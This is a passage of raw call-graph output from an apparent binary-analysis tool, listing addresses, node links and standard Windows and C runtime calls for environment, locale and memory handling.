API calls 18117->18122 18120 7ff6313d2980 57 API calls 18118->18120 18194 7ff6313d5190 GetProcAddress 18119->18194 18120->18123 18122->18102 18123->18109 18278 7ff6313d4d90 18124->18278 18126 7ff6313d5cf4 18127 7ff6313d5cfc 18126->18127 18128 7ff6313d5d0d 18126->18128 18129 7ff6313d2ad0 59 API calls 18127->18129 18285 7ff6313d44e0 18128->18285 18195 7ff6313d51b2 18194->18195 18196 7ff6313d51d0 GetProcAddress 18194->18196 18199 7ff6313d2980 57 API calls 18195->18199 18196->18195 18197 7ff6313d51f5 GetProcAddress 18196->18197 18197->18195 18198 7ff6313d521a GetProcAddress 18197->18198 18198->18195 18201 7ff6313d51c5 18199->18201 18201->18123 18280 7ff6313d4db5 18278->18280 18279 7ff6313d4dbd 18279->18126 18280->18279 18281 7ff6313d4f4f 18280->18281 18320 7ff6313e6e68 18280->18320 18282 7ff6313d50fa __std_exception_copy 18281->18282 18283 7ff6313d4200 47 API calls 18281->18283 18282->18126 18283->18281 18321 7ff6313e6e98 18320->18321 18324 7ff6313e6364 18321->18324 18325 7ff6313e6395 18324->18325 18326 7ff6313e63a7 18324->18326 19232 7ff6313eb440 19233 7ff6313eb445 19232->19233 19234 7ff6313eb45a 19232->19234 19238 7ff6313eb460 19233->19238 19239 7ff6313eb4a2 19238->19239 19240 7ff6313eb4aa 19238->19240 19241 7ff6313eadbc __free_lconv_mon 11 API calls 19239->19241 19242 7ff6313eadbc __free_lconv_mon 11 API calls 19240->19242 19241->19240 19243 7ff6313eb4b7 19242->19243 19244 7ff6313eadbc __free_lconv_mon 11 API calls 19243->19244 19245 7ff6313eb4c4 19244->19245 19246 7ff6313eadbc __free_lconv_mon 11 API calls 19245->19246 19247 7ff6313eb4d1 19246->19247 19248 7ff6313eadbc __free_lconv_mon 11 API calls 19247->19248 19249 7ff6313eb4de 19248->19249 19250 7ff6313eadbc __free_lconv_mon 11 API calls 19249->19250 19251 7ff6313eb4eb 19250->19251 19252 7ff6313eadbc __free_lconv_mon 11 API calls 19251->19252 19253 7ff6313eb4f8 19252->19253 19254 7ff6313eadbc __free_lconv_mon 11 API calls 19253->19254 19255 7ff6313eb505 19254->19255 19256 7ff6313eadbc __free_lconv_mon 11 API calls 19255->19256 19257 7ff6313eb515 19256->19257 19258 7ff6313eadbc __free_lconv_mon 11 API calls 19257->19258 19259 7ff6313eb525 19258->19259 19264 7ff6313eb308 19259->19264 19278 7ff6313f0b68 EnterCriticalSection 19264->19278 19294 7ff6313faa39 19295 7ff6313faa48 19294->19295 19297 7ff6313faa52 19294->19297 19298 7ff6313f0bc8 LeaveCriticalSection 19295->19298 19536 7ff6313f1bd0 19547 7ff6313f7b64 19536->19547 19548 7ff6313f7b71 19547->19548 19549 7ff6313eadbc __free_lconv_mon 11 API calls 19548->19549 19550 7ff6313f7b8d 19548->19550 19549->19548 19551 7ff6313eadbc __free_lconv_mon 11 API calls 19550->19551 19552 7ff6313f1bd9 19550->19552 19551->19550 19553 7ff6313f0b68 EnterCriticalSection 19552->19553 15354 7ff6313db1f0 15355 7ff6313db21e 15354->15355 15356 7ff6313db205 15354->15356 15356->15355 15358 7ff6313eda6c 12 API calls 15356->15358 15357 7ff6313db27c 15358->15357 18419 7ff6313f0de8 18420 7ff6313f0e0c 18419->18420 18422 7ff6313f0e1c 18419->18422 18421 7ff6313e52d4 _get_daylight 11 API calls 18420->18421 18444 7ff6313f0e11 18421->18444 18423 7ff6313f10fc 18422->18423 18425 7ff6313f0e3e 18422->18425 18424 7ff6313e52d4 _get_daylight 11 API calls 18423->18424 18426 7ff6313f1101 18424->18426 18427 7ff6313f0e5f 18425->18427 18571 7ff6313f14a4 18425->18571 18429 7ff6313eadbc __free_lconv_mon 11 API calls 18426->18429 18430 7ff6313f0ed1 18427->18430 18432 7ff6313f0e85 18427->18432 18436 7ff6313f0ec5 18427->18436 18429->18444 18434 7ff6313ef008 _get_daylight 11 API calls 18430->18434 18449 7ff6313f0e94 18430->18449 18431 7ff6313f0f7e 18443 7ff6313f0f9b 18431->18443 18450 7ff6313f0fed 18431->18450 18586 7ff6313e9b00 18432->18586 18437 7ff6313f0ee7 18434->18437 18436->18431 18436->18449 18592 7ff6313f78ac 18436->18592 18440 7ff6313eadbc __free_lconv_mon 11 API calls 18437->18440 18439 7ff6313eadbc __free_lconv_mon 11 API calls 18439->18444 18445 7ff6313f0ef5 18440->18445 18441 7ff6313f0e8f 18446 7ff6313e52d4 _get_daylight 11 API calls 18441->18446 18442 7ff6313f0ead 18442->18436 18448 7ff6313f14a4 45 API calls 18442->18448 18447 7ff6313eadbc __free_lconv_mon 11 API calls 18443->18447 18445->18436 18445->18449 18453 7ff6313ef008 _get_daylight 11 API calls 18445->18453 18446->18449 18451 7ff6313f0fa4 18447->18451 18448->18436 18449->18439 18450->18449 18452 7ff6313f38fc 40 API calls 18450->18452 18460 7ff6313f0fa9 18451->18460 18628 7ff6313f38fc 18451->18628 18454 7ff6313f102a 18452->18454 18457 7ff6313f0f17 18453->18457 18455 7ff6313eadbc __free_lconv_mon 11 API calls 18454->18455 18458 7ff6313f1034 18455->18458 18462 7ff6313eadbc __free_lconv_mon 11 API calls 18457->18462 18458->18449 18458->18460 18459 7ff6313f10f0 18464 7ff6313eadbc __free_lconv_mon 11 API calls 18459->18464 18460->18459 18465 7ff6313ef008 _get_daylight 11 API calls 18460->18465 18461 7ff6313f0fd5 18463 7ff6313eadbc __free_lconv_mon 11 API calls 18461->18463 18462->18436 18463->18460 18464->18444 18466 7ff6313f1078 18465->18466 18467 7ff6313f1080 18466->18467 18468 7ff6313f1089 18466->18468 18469 7ff6313eadbc __free_lconv_mon 11 API calls 18467->18469 18470 7ff6313ea8ec __std_exception_copy 37 API calls 18468->18470 18471 7ff6313f1087 18469->18471 18472 7ff6313f1098 18470->18472 18477 7ff6313eadbc __free_lconv_mon 11 API calls 18471->18477 18473 7ff6313f10a0 18472->18473 18474 7ff6313f112b 18472->18474 18637 7ff6313f79c4 18473->18637 18476 7ff6313ead74 _wfindfirst32i64 17 API calls 18474->18476 18479 7ff6313f113f 18476->18479 18477->18444 18482 7ff6313f1168 18479->18482 18489 7ff6313f1178 18479->18489 18480 7ff6313f10e8 18485 7ff6313eadbc __free_lconv_mon 11 API calls 18480->18485 18481 7ff6313f10c7 18483 7ff6313e52d4 _get_daylight 11 API calls 18481->18483 18484 7ff6313e52d4 _get_daylight 11 API calls 18482->18484 18486 7ff6313f10cc 18483->18486 18487 7ff6313f116d 18484->18487 18485->18459 18488 7ff6313eadbc __free_lconv_mon 11 API calls 18486->18488 18488->18471 18490 7ff6313f145b 18489->18490 18491 7ff6313f119a 18489->18491 18492 7ff6313e52d4 _get_daylight 11 API calls 18490->18492 18493 7ff6313f11b7 18491->18493 18550 7ff6313f158c 18491->18550 18494 7ff6313f1460 18492->18494 18497 7ff6313f122b 18493->18497 18499 7ff6313f11df 18493->18499 18502 7ff6313f121f 18493->18502 18496 7ff6313eadbc __free_lconv_mon 11 API calls 18494->18496 18496->18487 18503 7ff6313ef008 _get_daylight 11 API calls 18497->18503 18517 7ff6313f11ee 18497->18517 18520 7ff6313f1253 18497->18520 18498 7ff6313f12de 18511 7ff6313f12fb 18498->18511 18518 7ff6313f134e 18498->18518 18565 7ff6313e9b3c 18499->18565 18502->18498 18502->18517 18656 7ff6313f776c 18502->18656 18507 7ff6313f1245 18503->18507 18505 7ff6313ef008 _get_daylight 11 API calls 18510 7ff6313f1275 18505->18510 18506 7ff6313eadbc __free_lconv_mon 11 API calls 18506->18487 18514 7ff6313eadbc __free_lconv_mon 11 API calls 18507->18514 18508 7ff6313f11e9 18515 7ff6313e52d4 _get_daylight 11 API calls 18508->18515 18509 7ff6313f1207 18509->18502 18516 7ff6313f158c 45 API calls 18509->18516 18512 7ff6313eadbc __free_lconv_mon 11 API calls 18510->18512 18513 7ff6313eadbc __free_lconv_mon 11 API calls 18511->18513 18512->18502 18522 7ff6313f1304 18513->18522 18514->18520 18515->18517 18516->18502 18517->18506 18518->18517 18519 7ff6313f38fc 40 API calls 18518->18519 18521 7ff6313f138c 18519->18521 18520->18502 18520->18505 18520->18517 18523 7ff6313eadbc __free_lconv_mon 11 API calls 18521->18523 18524 7ff6313f38fc 40 API calls 18522->18524 18528 7ff6313f130a 18522->18528 18525 7ff6313f1396 18523->18525 18527 7ff6313f1336 18524->18527 18525->18517 18525->18528 18526 7ff6313f144f 18530 7ff6313eadbc __free_lconv_mon 11 API calls 18526->18530 18529 7ff6313eadbc __free_lconv_mon 11 API calls 18527->18529 18528->18526 18528->18528 18531 7ff6313ef008 _get_daylight 11 API calls 18528->18531 18529->18528 18530->18487 18532 7ff6313f13db 18531->18532 18533 7ff6313f13e3 18532->18533 18534 7ff6313f13ec 18532->18534 18536 7ff6313eadbc __free_lconv_mon 11 API calls 18533->18536 18535 7ff6313f0d04 _wfindfirst32i64 37 API calls 18534->18535 18537 7ff6313f13fa 18535->18537 18538 7ff6313f13ea 18536->18538 18539 7ff6313f1402 SetEnvironmentVariableW 18537->18539 18540 7ff6313f148f 18537->18540 18544 7ff6313eadbc __free_lconv_mon 11 API calls 18538->18544 18541 7ff6313f1426 18539->18541 18542 7ff6313f1447 18539->18542 18543 7ff6313ead74 _wfindfirst32i64 17 API calls 18540->18543 18545 7ff6313e52d4 _get_daylight 11 API calls 18541->18545 18547 7ff6313eadbc __free_lconv_mon 11 API calls 18542->18547 18546 7ff6313f14a3 18543->18546 18544->18487 18548 7ff6313f142b 18545->18548 18547->18526 18549 7ff6313eadbc __free_lconv_mon 11 API calls 18548->18549 18549->18538 18551 7ff6313f15af 18550->18551 18552 7ff6313f15cc 18550->18552 18551->18493 18553 7ff6313ef008 _get_daylight 11 API calls 18552->18553 18554 7ff6313f15f0 18553->18554 18555 7ff6313f1651 18554->18555 18559 7ff6313ef008 _get_daylight 11 API calls 18554->18559 18560 7ff6313eadbc __free_lconv_mon 11 API calls 18554->18560 18561 7ff6313f0d04 _wfindfirst32i64 37 API calls 18554->18561 18562 7ff6313f1660 18554->18562 18564 7ff6313f1674 18554->18564 18557 7ff6313eadbc __free_lconv_mon 11 API calls 18555->18557 18556 7ff6313ea94c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18558 7ff6313f167a 18556->18558 18557->18551 18559->18554 18560->18554 18561->18554 18563 7ff6313ead74 _wfindfirst32i64 17 API calls 18562->18563 18563->18564 18564->18556 18566 7ff6313e9b55 18565->18566 18567 7ff6313e9b4c 18565->18567 18566->18508 18566->18509 18567->18566 18680 7ff6313e964c 18567->18680 18572 7ff6313f14d9 18571->18572 18578 7ff6313f14c1 18571->18578 18573 7ff6313ef008 _get_daylight 11 API calls 18572->18573 18581 7ff6313f14fd 18573->18581 18574 7ff6313f155e 18576 7ff6313eadbc __free_lconv_mon 11 API calls 18574->18576 18575 7ff6313ea94c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18577 7ff6313f1588 18575->18577 18576->18578 18578->18427 18579 7ff6313ef008 _get_daylight 11 API calls 18579->18581 18580 7ff6313eadbc __free_lconv_mon 11 API calls 18580->18581 18581->18574 18581->18579 18581->18580 18582 7ff6313ea8ec __std_exception_copy 37 API calls 18581->18582 18583 7ff6313f156d 18581->18583 18585 7ff6313f1582 18581->18585 18582->18581 18584 7ff6313ead74 _wfindfirst32i64 17 API calls 18583->18584 18584->18585 18585->18575 18587 7ff6313e9b10 18586->18587 18590 7ff6313e9b19 18586->18590 18587->18590 18733 7ff6313e95d8 18587->18733 18590->18441 18590->18442 18593 7ff6313f6a5c 18592->18593 18594 7ff6313f78b9 18592->18594 18595 7ff6313f6a69 18593->18595 18599 7ff6313f6a9f 18593->18599 18596 7ff6313e58ac 45 API calls 18594->18596 18598 7ff6313e52d4 _get_daylight 11 API calls 18595->18598 18615 7ff6313f6a10 18595->18615 18601 7ff6313f78ed 18596->18601 18597 7ff6313f6ac9 18602 7ff6313e52d4 _get_daylight 11 API calls 18597->18602 18603 7ff6313f6a73 18598->18603 18599->18597 18604 7ff6313f6aee 18599->18604 18600 7ff6313f78f2 18600->18436 18601->18600 18605 7ff6313f7903 18601->18605 18608 7ff6313f791a 18601->18608 18606 7ff6313f6ace 18602->18606 18607 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18603->18607 18614 7ff6313e58ac 45 API calls 18604->18614 18618 7ff6313f6ad9 18604->18618 18609 7ff6313e52d4 _get_daylight 11 API calls 18605->18609 18610 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18606->18610 18611 7ff6313f6a7e 18607->18611 18612 7ff6313f7924 18608->18612 18613 7ff6313f7936 18608->18613 18616 7ff6313f7908 18609->18616 18610->18618 18611->18436 18617 7ff6313e52d4 _get_daylight 11 API calls 18612->18617 18619 7ff6313f795e 18613->18619 18620 7ff6313f7947 18613->18620 18614->18618 18615->18436 18621 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18616->18621 18622 7ff6313f7929 18617->18622 18618->18436 18959 7ff6313f96d4 18619->18959 18950 7ff6313f6aac 18620->18950 18621->18600 18625 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18622->18625 18625->18600 18627 7ff6313e52d4 _get_daylight 11 API calls 18627->18600 18629 7ff6313f391e 18628->18629 18630 7ff6313f393b 18628->18630 18629->18630 18631 7ff6313f392c 18629->18631 18632 7ff6313f3945 18630->18632 18999 7ff6313f83b8 18630->18999 18633 7ff6313e52d4 _get_daylight 11 API calls 18631->18633 19006 7ff6313f0d6c 18632->19006 18636 7ff6313f3931 memcpy_s 18633->18636 18636->18461 18638 7ff6313e58ac 45 API calls 18637->18638 18639 7ff6313f7a2a 18638->18639 18640 7ff6313ef294 5 API calls 18639->18640 18641 7ff6313f7a38 18639->18641 18640->18641 18642 7ff6313e5394 14 API calls 18641->18642 18643 7ff6313f7a94 18642->18643 18644 7ff6313f7b24 18643->18644 18645 7ff6313e58ac 45 API calls 18643->18645 18646 7ff6313f7b35 18644->18646 18648 7ff6313eadbc __free_lconv_mon 11 API calls 18644->18648 18647 7ff6313f7aa7 18645->18647 18649 7ff6313f10c3 18646->18649 18651 7ff6313eadbc __free_lconv_mon 11 API calls 18646->18651 18650 7ff6313ef294 5 API calls 18647->18650 18652 7ff6313f7ab0 18647->18652 18648->18646 18649->18480 18649->18481 18650->18652 18651->18649 18653 7ff6313e5394 14 API calls 18652->18653 18654 7ff6313f7b0b 18653->18654 18654->18644 18655 7ff6313f7b13 SetEnvironmentVariableW 18654->18655 18655->18644 18657 7ff6313f7779 18656->18657 18660 7ff6313f77a6 18656->18660 18658 7ff6313f777e 18657->18658 18657->18660 18659 7ff6313e52d4 _get_daylight 11 API calls 18658->18659 18662 7ff6313f7783 18659->18662 18661 7ff6313f77ea 18660->18661 18664 7ff6313f7809 18660->18664 18678 7ff6313f77de __crtLCMapStringW 18660->18678 18663 7ff6313e52d4 _get_daylight 11 API calls 18661->18663 18665 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18662->18665 18669 7ff6313f77ef 18663->18669 18666 7ff6313f7825 18664->18666 18667 7ff6313f7813 18664->18667 18668 7ff6313f778e 18665->18668 18671 7ff6313e58ac 45 API calls 18666->18671 18670 7ff6313e52d4 _get_daylight 11 API calls 18667->18670 18668->18502 18672 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18669->18672 18673 7ff6313f7818 18670->18673 18674 7ff6313f7832 18671->18674 18672->18678 18675 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18673->18675 18674->18678 19018 7ff6313f9290 18674->19018 18675->18678 18678->18502 18679 7ff6313e52d4 _get_daylight 11 API calls 18679->18678 18681 7ff6313e9665 18680->18681 18692 7ff6313e9661 18680->18692 18701 7ff6313f2f5c GetEnvironmentStringsW 18681->18701 18684 7ff6313e9672 18686 7ff6313eadbc __free_lconv_mon 11 API calls 18684->18686 18685 7ff6313e967e 18708 7ff6313e97cc 18685->18708 18686->18692 18689 7ff6313eadbc __free_lconv_mon 11 API calls 18690 7ff6313e96a5 18689->18690 18691 7ff6313eadbc __free_lconv_mon 11 API calls 18690->18691 18691->18692 18692->18566 18693 7ff6313e9a0c 18692->18693 18694 7ff6313e9a2f 18693->18694 18695 7ff6313e9a46 18693->18695 18694->18566 18695->18694 18696 7ff6313ef008 _get_daylight 11 API calls 18695->18696 18697 7ff6313e9aba 18695->18697 18698 7ff6313efab0 MultiByteToWideChar _fread_nolock 18695->18698 18700 7ff6313eadbc __free_lconv_mon 11 API calls 18695->18700 18696->18695 18699 7ff6313eadbc __free_lconv_mon 11 API calls 18697->18699 18698->18695 18699->18694 18700->18695 18702 7ff6313e966a 18701->18702 18703 7ff6313f2f80 18701->18703 18702->18684 18702->18685 18704 7ff6313eda6c _fread_nolock 12 API calls 18703->18704 18705 7ff6313f2fb7 memcpy_s 18704->18705 18706 7ff6313eadbc __free_lconv_mon 11 API calls 18705->18706 18707 7ff6313f2fd7 FreeEnvironmentStringsW 18706->18707 18707->18702 18709 7ff6313e97f4 18708->18709 18710 7ff6313ef008 _get_daylight 11 API calls 18709->18710 18722 7ff6313e982f 18710->18722 18711 7ff6313e9837 18712 7ff6313eadbc __free_lconv_mon 11 API calls 18711->18712 18714 7ff6313e9686 18712->18714 18713 7ff6313e98b1 18715 7ff6313eadbc __free_lconv_mon 11 API calls 18713->18715 18714->18689 18715->18714 18716 7ff6313ef008 _get_daylight 11 API calls 18716->18722 18717 7ff6313e98a0 18727 7ff6313e98e8 18717->18727 18718 7ff6313f0d04 _wfindfirst32i64 37 API calls 18718->18722 18721 7ff6313e98d4 18724 7ff6313ead74 _wfindfirst32i64 17 API calls 18721->18724 18722->18711 18722->18713 18722->18716 18722->18717 18722->18718 18722->18721 18725 7ff6313eadbc __free_lconv_mon 11 API calls 18722->18725 18723 7ff6313eadbc __free_lconv_mon 11 API calls 18723->18711 18726 7ff6313e98e6 18724->18726 18725->18722 18728 7ff6313e98ed 18727->18728 18729 7ff6313e98a8 18727->18729 18730 7ff6313e9916 18728->18730 18732 7ff6313eadbc __free_lconv_mon 11 API calls 18728->18732 18729->18723 18731 7ff6313eadbc __free_lconv_mon 11 API calls 18730->18731 18731->18729 18732->18728 18734 7ff6313e95f1 18733->18734 18735 7ff6313e95ed 18733->18735 18756 7ff6313f2b10 18734->18756 18735->18590 18748 7ff6313e992c 18735->18748 18740 7ff6313e9603 18742 7ff6313eadbc __free_lconv_mon 11 API calls 18740->18742 18741 7ff6313e960f 18782 7ff6313e96bc 18741->18782 18742->18735 18745 7ff6313eadbc __free_lconv_mon 11 API calls 18746 7ff6313e9636 18745->18746 18747 7ff6313eadbc __free_lconv_mon 11 API calls 18746->18747 18747->18735 18749 7ff6313e9955 18748->18749 18753 7ff6313e996e 18748->18753 18749->18590 18750 7ff6313f0378 WideCharToMultiByte 18750->18753 18751 7ff6313ef008 _get_daylight 11 API calls 18751->18753 18752 7ff6313e99fe 18754 7ff6313eadbc __free_lconv_mon 11 API calls 18752->18754 18753->18749 18753->18750 18753->18751 18753->18752 18755 7ff6313eadbc __free_lconv_mon 11 API calls 18753->18755 18754->18749 18755->18753 18757 7ff6313f2b1d 18756->18757 18761 7ff6313e95f6 18756->18761 18801 7ff6313eb694 18757->18801 18762 7ff6313f2e4c GetEnvironmentStringsW 18761->18762 18763 7ff6313e95fb 18762->18763 18764 7ff6313f2e7c 18762->18764 18763->18740 18763->18741 18765 7ff6313f0378 WideCharToMultiByte 18764->18765 18766 7ff6313f2ecd 18765->18766 18767 7ff6313f2ed4 FreeEnvironmentStringsW 18766->18767 18768 7ff6313eda6c _fread_nolock 12 API calls 18766->18768 18767->18763 18769 7ff6313f2ee7 18768->18769 18770 7ff6313f2eef 18769->18770 18771 7ff6313f2ef8 18769->18771 18773 7ff6313eadbc __free_lconv_mon 11 API calls 18770->18773 18772 7ff6313f0378 WideCharToMultiByte 18771->18772 18775 7ff6313f2f1b 18772->18775 18774 7ff6313f2ef6 18773->18774 18774->18767 18776 7ff6313f2f1f 18775->18776 18777 7ff6313f2f29 18775->18777 18778 7ff6313eadbc __free_lconv_mon 11 API calls 18776->18778 18779 7ff6313eadbc __free_lconv_mon 11 API calls 18777->18779 18780 7ff6313f2f27 FreeEnvironmentStringsW 18778->18780 18779->18780 18780->18763 18783 7ff6313e96e1 18782->18783 18784 7ff6313ef008 _get_daylight 11 API calls 18783->18784 18795 7ff6313e9717 18784->18795 18785 7ff6313e971f 18786 7ff6313eadbc __free_lconv_mon 11 API calls 18785->18786 18787 7ff6313e9617 18786->18787 18787->18745 18788 7ff6313e9792 18789 7ff6313eadbc __free_lconv_mon 11 API calls 18788->18789 18789->18787 18790 7ff6313ef008 _get_daylight 11 API calls 18790->18795 18791 7ff6313e9781 18793 7ff6313e98e8 11 API calls 18791->18793 18792 7ff6313ea8ec __std_exception_copy 37 API calls 18792->18795 18794 7ff6313e9789 18793->18794 18797 7ff6313eadbc __free_lconv_mon 11 API calls 18794->18797 18795->18785 18795->18788 18795->18790 18795->18791 18795->18792 18796 7ff6313e97b7 18795->18796 18799 7ff6313eadbc __free_lconv_mon 11 API calls 18795->18799 18798 7ff6313ead74 _wfindfirst32i64 17 API calls 18796->18798 18797->18785 18800 7ff6313e97ca 18798->18800 18799->18795 18802 7ff6313eb6a5 FlsGetValue 18801->18802 18803 7ff6313eb6c0 FlsSetValue 18801->18803 18804 7ff6313eb6b2 18802->18804 18805 7ff6313eb6ba 18802->18805 18803->18804 18806 7ff6313eb6cd 18803->18806 18807 7ff6313eb6b8 18804->18807 18808 7ff6313ea94c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18804->18808 18805->18803 18809 7ff6313ef008 _get_daylight 11 API calls 18806->18809 18821 7ff6313f27e4 18807->18821 18810 7ff6313eb735 18808->18810 18811 7ff6313eb6dc 18809->18811 18812 7ff6313eb6fa FlsSetValue 18811->18812 18813 7ff6313eb6ea FlsSetValue 18811->18813 18815 7ff6313eb718 18812->18815 18816 7ff6313eb706 FlsSetValue 18812->18816 18814 7ff6313eb6f3 18813->18814 18817 7ff6313eadbc __free_lconv_mon 11 API calls 18814->18817 18818 7ff6313eb368 _get_daylight 11 API calls 18815->18818 18816->18814 18817->18804 18819 7ff6313eb720 18818->18819 18820 7ff6313eadbc __free_lconv_mon 11 API calls 18819->18820 18820->18807 18844 7ff6313f2a54 18821->18844 18823 7ff6313f2819 18859 7ff6313f24e4 18823->18859 18826 7ff6313f2836 18826->18761 18827 7ff6313eda6c _fread_nolock 12 API calls 18828 7ff6313f2847 18827->18828 18829 7ff6313f284f 18828->18829 18831 7ff6313f285e 18828->18831 18830 7ff6313eadbc __free_lconv_mon 11 API calls 18829->18830 18830->18826 18831->18831 18866 7ff6313f2b8c 18831->18866 18834 7ff6313f295a 18835 7ff6313e52d4 _get_daylight 11 API calls 18834->18835 18836 7ff6313f295f 18835->18836 18839 7ff6313eadbc __free_lconv_mon 11 API calls 18836->18839 18837 7ff6313f29b5 18838 7ff6313f2a1c 18837->18838 18877 7ff6313f2314 18837->18877 18842 7ff6313eadbc __free_lconv_mon 11 API calls 18838->18842 18839->18826 18840 7ff6313f2974 18840->18837 18843 7ff6313eadbc __free_lconv_mon 11 API calls 18840->18843 18842->18826 18843->18837 18845 7ff6313f2a77 18844->18845 18846 7ff6313f2a81 18845->18846 18892 7ff6313f0b68 EnterCriticalSection 18845->18892 18850 7ff6313f2af3 18846->18850 18852 7ff6313ea94c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18846->18852 18850->18823 18853 7ff6313f2b0b 18852->18853 18855 7ff6313f2b62 18853->18855 18856 7ff6313eb694 50 API calls 18853->18856 18855->18823 18857 7ff6313f2b4c 18856->18857 18858 7ff6313f27e4 65 API calls 18857->18858 18858->18855 18860 7ff6313e58ac 45 API calls 18859->18860 18861 7ff6313f24f8 18860->18861 18862 7ff6313f2504 GetOEMCP 18861->18862 18863 7ff6313f2516 18861->18863 18865 7ff6313f252b 18862->18865 18864 7ff6313f251b GetACP 18863->18864 18863->18865 18864->18865 18865->18826 18865->18827 18867 7ff6313f24e4 47 API calls 18866->18867 18868 7ff6313f2bb9 18867->18868 18870 7ff6313f2d0f 18868->18870 18871 7ff6313f2bf6 IsValidCodePage 18868->18871 18876 7ff6313f2c10 memcpy_s 18868->18876 18869 7ff6313dbc70 _wfindfirst32i64 8 API calls 18872 7ff6313f2951 18869->18872 18870->18869 18871->18870 18873 7ff6313f2c07 18871->18873 18872->18834 18872->18840 18874 7ff6313f2c36 GetCPInfo 18873->18874 18873->18876 18874->18870 18874->18876 18893 7ff6313f25fc 18876->18893 18949 7ff6313f0b68 EnterCriticalSection 18877->18949 18894 7ff6313f2639 GetCPInfo 18893->18894 18895 7ff6313f272f 18893->18895 18894->18895 18900 7ff6313f264c 18894->18900 18896 7ff6313dbc70 _wfindfirst32i64 8 API calls 18895->18896 18898 7ff6313f27ce 18896->18898 18897 7ff6313f3360 48 API calls 18899 7ff6313f26c3 18897->18899 18898->18870 18904 7ff6313f8304 18899->18904 18900->18897 18903 7ff6313f8304 54 API calls 18903->18895 18905 7ff6313e58ac 45 API calls 18904->18905 18906 7ff6313f8329 18905->18906 18909 7ff6313f7fd0 18906->18909 18910 7ff6313f8011 18909->18910 18911 7ff6313efab0 _fread_nolock MultiByteToWideChar 18910->18911 18914 7ff6313f805b 18911->18914 18912 7ff6313f82d9 18913 7ff6313dbc70 _wfindfirst32i64 8 API calls 18912->18913 18915 7ff6313f26f6 18913->18915 18914->18912 18916 7ff6313eda6c _fread_nolock 12 API calls 18914->18916 18917 7ff6313f8191 18914->18917 18919 7ff6313f8093 18914->18919 18915->18903 18916->18919 18917->18912 18918 7ff6313eadbc __free_lconv_mon 11 API calls 18917->18918 18918->18912 18919->18917 18920 7ff6313efab0 _fread_nolock MultiByteToWideChar 18919->18920 18921 7ff6313f8106 18920->18921 18921->18917 18940 7ff6313ef454 18921->18940 18924 7ff6313f81a2 18926 7ff6313eda6c _fread_nolock 12 API calls 18924->18926 18928 7ff6313f8274 18924->18928 18929 7ff6313f81c0 18924->18929 18925 7ff6313f8151 18925->18917 18927 7ff6313ef454 __crtLCMapStringW 6 API calls 18925->18927 18926->18929 18927->18917 18928->18917 18930 7ff6313eadbc __free_lconv_mon 11 API calls 18928->18930 18929->18917 18931 7ff6313ef454 __crtLCMapStringW 6 API calls 18929->18931 18930->18917 18932 7ff6313f8240 18931->18932 18932->18928 18933 7ff6313f8260 18932->18933 18934 7ff6313f8276 18932->18934 18936 7ff6313f0378 WideCharToMultiByte 18933->18936 18935 7ff6313f0378 WideCharToMultiByte 18934->18935 18937 7ff6313f826e 18935->18937 18936->18937 18937->18928 18938 7ff6313f828e 18937->18938 18938->18917 18939 7ff6313eadbc __free_lconv_mon 11 API calls 18938->18939 18939->18917 18941 7ff6313ef080 __crtLCMapStringW 5 API calls 18940->18941 18942 7ff6313ef492 18941->18942 18943 7ff6313ef49a 18942->18943 18946 7ff6313ef540 18942->18946 18943->18917 18943->18924 18943->18925 18945 7ff6313ef503 LCMapStringW 18945->18943 18947 7ff6313ef080 __crtLCMapStringW 5 API calls 18946->18947 18948 7ff6313ef56e __crtLCMapStringW 18947->18948 18948->18945 18951 7ff6313f6ae0 18950->18951 18952 7ff6313f6ac9 18950->18952 18951->18952 18954 7ff6313f6aee 18951->18954 18953 7ff6313e52d4 _get_daylight 11 API calls 18952->18953 18955 7ff6313f6ace 18953->18955 18957 7ff6313e58ac 45 API calls 18954->18957 18958 7ff6313f6ad9 18954->18958 18956 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 18955->18956 18956->18958 18957->18958 18958->18600 18960 7ff6313e58ac 45 API calls 18959->18960 18961 7ff6313f96f9 18960->18961 18964 7ff6313f9350 18961->18964 18968 7ff6313f939e 18964->18968 18965 7ff6313dbc70 _wfindfirst32i64 8 API calls 18966 7ff6313f7985 18965->18966 18966->18600 18966->18627 18967 7ff6313f9425 18969 7ff6313efab0 _fread_nolock MultiByteToWideChar 18967->18969 18973 7ff6313f9429 18967->18973 18968->18967 18970 7ff6313f9410 GetCPInfo 18968->18970 18968->18973 18971 7ff6313f94bd 18969->18971 18970->18967 18970->18973 18972 7ff6313eda6c _fread_nolock 12 API calls 18971->18972 18971->18973 18974 7ff6313f94f4 18971->18974 18972->18974 18973->18965 18974->18973 18975 7ff6313efab0 _fread_nolock MultiByteToWideChar 18974->18975 18976 7ff6313f9562 18975->18976 18977 7ff6313f9644 18976->18977 18978 7ff6313efab0 _fread_nolock MultiByteToWideChar 18976->18978 18977->18973 18979 7ff6313eadbc __free_lconv_mon 11 API calls 18977->18979 18980 7ff6313f9588 18978->18980 18979->18973 18980->18977 18981 7ff6313eda6c _fread_nolock 12 API calls 18980->18981 18982 7ff6313f95b5 18980->18982 18981->18982 18982->18977 18983 7ff6313efab0 _fread_nolock MultiByteToWideChar 18982->18983 18984 7ff6313f962c 18983->18984 18985 7ff6313f9632 18984->18985 18986 7ff6313f964c 18984->18986 18985->18977 18988 7ff6313eadbc __free_lconv_mon 11 API calls 18985->18988 18993 7ff6313ef2d8 18986->18993 18988->18977 18990 7ff6313f968b 18990->18973 18992 7ff6313eadbc __free_lconv_mon 11 API calls 18990->18992 18991 7ff6313eadbc __free_lconv_mon 11 API calls 18991->18990 18992->18973 18994 7ff6313ef080 __crtLCMapStringW 5 API calls 18993->18994 18995 7ff6313ef316 18994->18995 18996 7ff6313ef31e 18995->18996 18997 7ff6313ef540 __crtLCMapStringW 5 API calls 18995->18997 18996->18990 18996->18991 18998 7ff6313ef387 CompareStringW 18997->18998 18998->18996 19000 7ff6313f83c1 18999->19000 19001 7ff6313f83da HeapSize 18999->19001 19002 7ff6313e52d4 _get_daylight 11 API calls 19000->19002 19003 